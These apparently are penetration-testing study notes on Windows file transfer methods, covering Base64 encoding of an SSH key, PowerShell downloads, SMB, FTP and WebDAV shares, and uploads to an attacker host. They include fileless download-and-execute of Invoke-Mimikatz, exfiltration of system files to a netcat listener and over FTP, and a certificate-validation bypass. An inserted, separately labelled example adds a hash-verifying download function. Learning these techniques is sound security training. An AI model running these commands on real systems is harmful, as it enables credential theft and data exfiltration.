Windows File Transfer Methods
A DLL (Dynamic Link Library) is a file that holds functions (pieces of code) that other
programs can use when they need them. It helps save space and reuse code in different
programs.
Tools Used:
WMIC: A command-line tool for system management, used to execute commands and
control processes.
Bitsadmin: A tool for managing file transfers, used by attackers to download files quietly.
Certutil: A tool for managing certificates, also used to decode base64-encoded malicious
payloads.
regsvr32: A tool to register and load (run) DLLs, exploited by attackers to run malicious
code.
Userinit Process: A trusted process that runs at startup, used by attackers to hide malware
and evade detection.
Download Operations
md5sum is a Linux command-line utility that calculates the MD5 hash (also called an MD5
checksum) of a file, like Get-FileHash on Windows.
md5sum id_rsa
Get-FileHash path_to_file -Algorithm md5
Encode SSH Key to Base64
cat id_rsa | base64 -w 0; echo
Paste the Base64 string into a Windows PowerShell terminal and decode it back to a file:
[[Link]]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("base64_string"))
Confirming the MD5 Hashes Match
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
PowerShell Web Downloads
WebClient methods for downloading data from a resource:
[Link] class
Method               Description
OpenRead             Returns the data from a resource as a Stream.
OpenReadAsync        Returns the data from a resource without blocking the calling thread.
DownloadData         Downloads data from a resource and returns a Byte array.
DownloadDataAsync    Downloads data from a resource and returns a Byte array without blocking the calling thread.
DownloadFile         Downloads data from a resource to a local file.
DownloadFileAsync    Downloads data from a resource to a local file without blocking the calling thread.
DownloadString       Downloads a String from a resource and returns a String.
DownloadStringAsync  Downloads a String from a resource without blocking the calling thread.
(New-Object [Link]).DownloadFile('<Target File URL>','<Output File Name>')
(New-Object [Link]).DownloadFileAsync('<Target File URL>','<Output File Name>')
PowerShell DownloadString - Fileless Method:
Download and Execute in Memory:
IEX (New-Object [Link]).DownloadString('[Link]Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
This command downloads a PowerShell script from the web and immediately executes it in
memory without saving it to the disk.
Alternative using Pipeline:
(New-Object [Link]).DownloadString('[Link]Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
This is just another way of writing the same thing, where the downloaded string (the script) is
passed directly to IEX to be executed in memory.
PowerShell Invoke-WebRequest
To download a file from a URL:
Invoke-WebRequest [Link]ew.ps1 -OutFile PowerView.ps1
Aliases: curl, wget, iwr
Common Errors with PowerShell
Bypass the Internet Explorer first-launch configuration error -> add -UseBasicParsing
Bypass SSL/TLS certificate errors (this disables certificate validation for the whole
PowerShell session) ->
[[Link]]::ServerCertificateValidationCallback = {$true}
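As an added example (not from the original notes) that covers both the Base64 transfer with its MD5 check above and the two download errors just listed: one PowerShell function that writes a file from either a Base64 string or a URL, avoids the Internet Explorer error with -UseBasicParsing, requires TLS 1.2 instead of disabling certificate validation, and keeps the file only when its hash matches a value obtained out of band. The function and parameter names are assumptions, and the Base64/MD5 sample at the end is constructed.

```powershell
# Added example, not from the original notes. Function, parameter names and the
# sample values are assumptions; the Base64/MD5 pair at the bottom is constructed.
function Receive-VerifiedFile {
    [CmdletBinding(DefaultParameterSetName = 'Web')]
    param(
        [Parameter(Mandatory, ParameterSetName = 'Web')]    [string] $Uri,
        [Parameter(Mandatory, ParameterSetName = 'Base64')] [string] $Base64,
        [Parameter(Mandatory)] [string] $OutFile,
        [Parameter(Mandatory)] [string] $ExpectedHash,      # hex digest, or a whole md5sum/sha256sum line
        [ValidateSet('MD5', 'SHA256')] [string] $Algorithm = 'SHA256'
    )
    # md5sum/sha256sum print "<hash>  <name>"; keep only the hash so the line can be pasted as-is.
    $expected = ($ExpectedHash.Trim() -split '\s+')[0]
    $tmp = "${OutFile}.part"   # write to a scratch name; the real name is only used once verified
    if ($PSCmdlet.ParameterSetName -eq 'Base64') {
        # Same decode as the WriteAllBytes one-liner above; FromBase64String throws on a bad paste.
        [System.IO.File]::WriteAllBytes($tmp, [Convert]::FromBase64String($Base64.Trim()))
    }
    else {
        # Require TLS 1.2 (PowerShell 5.1 may still offer TLS 1.0) instead of disabling
        # certificate validation with ServerCertificateValidationCallback = {$true}.
        [Net.ServicePointManager]::SecurityProtocol =
            [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12
        try {
            # -UseBasicParsing avoids the Internet Explorer first-launch configuration error.
            Invoke-WebRequest -Uri $Uri -OutFile $tmp -UseBasicParsing -ErrorAction Stop
        }
        catch {
            throw "Download of ${Uri} failed: $($_.Exception.Message)"
        }
    }
    # Get-FileHash returns upper-case hex, md5sum lower-case; -ne compares case-insensitively.
    $actual = (Get-FileHash -Path $tmp -Algorithm $Algorithm).Hash
    if ($actual -ne $expected) {
        Remove-Item -Path $tmp -Force   # never leave an unverified file behind
        throw "$Algorithm mismatch for ${OutFile}: expected $expected, got $actual"
    }
    Move-Item -Path $tmp -Destination $OutFile -Force
    return [pscustomobject]@{ Path = $OutFile; Algorithm = $Algorithm; Hash = $actual }
}

# Constructed sample: on the Linux side  printf 'Hello World\n' > note.txt
#   base64 -w 0 note.txt   -> SGVsbG8gV29ybGQK
#   md5sum note.txt        -> e59ff97941044f85df5297e1c302d260  note.txt
Receive-VerifiedFile -Base64 'SGVsbG8gV29ybGQK' -OutFile "$env:TEMP\note.txt" `
    -ExpectedHash 'e59ff97941044f85df5297e1c302d260  note.txt' -Algorithm MD5
# Web download (placeholders, not real values):
# Receive-VerifiedFile -Uri 'https://<server>/PowerView.ps1' -OutFile "$env:TEMP\PowerView.ps1" -ExpectedHash '<sha256 from the publisher>'
```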
SMB downloads
Start SMB server
sudo impacket-smbserver share -smb2support /tmp/smbshare
Download from Windows
copy \\<IP>\share\filename
If guest access is blocked -> Start SMB server with credentials :
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount SMB share on Windows
net use n: \\<IP>\share /user:test test
copy n:\filename
Use net use if copy \\<IP>\share\filename gives an access error.
FTP Downloads
Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21
Transferring Files from an FTP Server Using PowerShell
(New-Object [Link]).DownloadFile('[Link]', 'C:\Users\Public\[Link]')
Using built-in FTP client (for non-interactive shells)
echo open <your-ip> > [Link]
echo USER anonymous >> [Link]
echo binary >> [Link]
echo GET [Link] >> [Link]
echo bye >> [Link]
ftp -v -n -s:[Link]
Check if the file was downloaded:
more [Link]
Upload Operations
Encode File Using PowerShell
[Convert]::ToBase64String((Get-Content -Path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
Decode Base64 String in Linux
echo "<base64_string>" | base64 -d > hosts
Confirm by hash
md5sum hosts
PowerShell Script to Upload a File to Python Upload Server
IEX (New-Object [Link]).DownloadString('[Link]plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri [Link] -File C:\Windows\System32\drivers\etc\hosts
[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373
PowerShell Base64 Web Upload
On the target:
Grab the content of a file and encode it in Base64:
$b64 = [[Link]]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Then send it using a POST request:
Invoke-WebRequest -Uri [Link] -Method POST -Body $b64
On your host:
nc -lvnp 8000
From the netcat output, copy only the Base64 string and decode it:
echo "<base64>" | base64 -d > hosts
SMB Uploads
Most networks block outbound SMB (TCP/445) due to security risks, but WebDAV (which runs
over HTTP/HTTPS) can be used as an alternative to transfer files when SMB is restricted, since
Windows falls back to WebDAV over HTTP when the SMB connection to a UNC path fails.
Using WebDAV
sudo wsgidav --host=[Link] --port=80 --root=/tmp --auth=anonymous
Connecting to the WebDAV Share
dir \\[Link]\DavWWWRoot
Uploading Files to the WebDAV Share with copy
copy C:\Users\john\Desktop\[Link] \\[Link]\DavWWWRoot\
copy C:\Users\john\Desktop\[Link] \\[Link]\sharefolder\
DavWWWRoot is a Windows Shell keyword used to indicate the root of a WebDAV server; it
doesn't exist on the actual server.
You can skip DavWWWRoot by directly referencing a real folder (e.g., \\[Link]\sharefolder).
If SMB (TCP/445) is not blocked, impacket-smbserver can be used for file
uploads/downloads just like in normal SMB operations.
FTP Uploads
Starting the server:
sudo python3 -m pyftpdlib --port 21 --write
--write -> allows clients to upload files to our attack host.
Upload a file using the built-in FTP client (non-interactive script):
C:\user1> echo open [Link] > [Link]
C:\user1> echo USER anonymous >> [Link]
C:\user1> echo binary >> [Link]
C:\user1> echo PUT c:\windows\system32\drivers\etc\hosts >> [Link]
C:\user1> echo bye >> [Link]
C:\user1> ftp -v -n -s:[Link]
ftp> open [Link]
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
Linux File Transfer Methods